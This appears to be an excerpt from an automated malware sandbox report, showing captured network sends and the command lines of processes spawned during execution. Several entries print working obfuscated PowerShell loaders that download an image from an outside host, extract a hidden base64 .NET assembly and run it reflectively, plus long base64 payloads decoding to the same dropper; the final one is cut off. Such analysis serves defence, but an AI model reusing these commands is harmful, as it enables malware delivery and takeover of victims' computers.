WSASend Nov. 13, 2023, 10:55 a.m.	buffer: ÀO/ÇâèévtºèÒWr§G=x ïáÊ;ö×;dêd9^O×2I¦i¨aV¤Õ#æy÷Þnßèï¥¡<[º¨8RÏ>ß.¹8éõyíà4%'Ï¶\|Æ¸$J)´Ôq1S\<Ç½cå1aðw÷:Ô6X"®ëÄ!£Ûr±Õ/êÁ"kéZSøìÕÏÂ$bÐ¥Dù ¬~½7Õ¤$Vß«þE' socket: 592		0
send Nov. 13, 2023, 10:55 a.m.	buffer: yueQ UÞ:"<®Ùk6ä J/oTbÈÉ%/5 ÀÀÀ À 284ÿuploaddeimagens.com.br socket: 1440 sent: 126	1	126
send Nov. 13, 2023, 10:55 a.m.	buffer: FBA¸Ùó!åÒÙwÛÂjä#z?@KvmûÅªCRúZýð,#Û.tö0¦-#ì©I¬2ØÞÀl0UÆtsÍ>a÷Ó¦hÐÚäI }WhIÑ&Î ¥¢d¹\»»Í @-×yUL socket: 1440 sent: 134	1	134
WSASend Nov. 13, 2023, 10:55 a.m.	buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com socket: 2028		0

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([STRINg]$verboSePrefeRenCe)[1,3]+'x'-join'')( ('N6zimageUrl = 9mBhttps://uploa'+'ddeimagen'+'s.com.br/images/004/654/536/original/new_image.'+'jpg?16989577509mB;N6zwebClient'+' = New-Object System.Net.WebClient;N6zimageBytes = N6zwebClient.DownloadData(N6zi'+'mageUrl);N6zimageText = [System.Text.Encoding]::UTF8.GetString(N6zimageBytes);N6zstartFlag = 9mB<<BASE64_START>>9mB;N6zendFlag = 9mB<<BASE64_END>>9mB;N6zstartInd'+'ex = N6zim'+'ageText.IndexOf(N6z'+'st'+'artFlag);N6zendIndex = N6zimageText.IndexOf(N6zendFlag);N6zstartIndex -ge 0 -and N6zendIndex -gt N6zstartIndex;N6zstartIndex'+' += N6z'+'startFlag.Le'+'ngth;N6zbase64Length = N6zendIndex - N6zstartIndex;N6zbase64Command = N6zimageText.Substring(N6zstartIndex, N6zbase'+'64Length);N6zcommandBytes = [System.Co'+'nvert]::Fr'+'omBase64String(N6zbase64Command'+');N6zloadedAssembly = [System.Reflection.Assembly]::Load(N6zcommandBytes);N6'+'ztype = N6zloade'+'dAssembly.GetT'+'ype(9mBFiber.Home9mB);N6zmethod = N6ztype.GetMethod(9mBVAI9mB).Inv'+'oke(N6znull, [object[]] (9mBdHh0LkNCTi8wNTIvMjMuOTQyLj'+'cyMS44ODEvLzpwdHRo9mB , 9mB9mB , 9mB29mB , 9mBregasm9mB , 9mB69mB , 9mBC:THfWindowsTHfTempTHf9mB, 9mBhtmlcvg9mB))').rePlACE('THf',[striNg][CHaR]92).rePlACE('N6z',[striNg][CHaR]36).rePlACE('9mB',[striNg][CHaR]39) )"
parent_process	wscript.exe	martian_process	powershell -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UyQMlvG','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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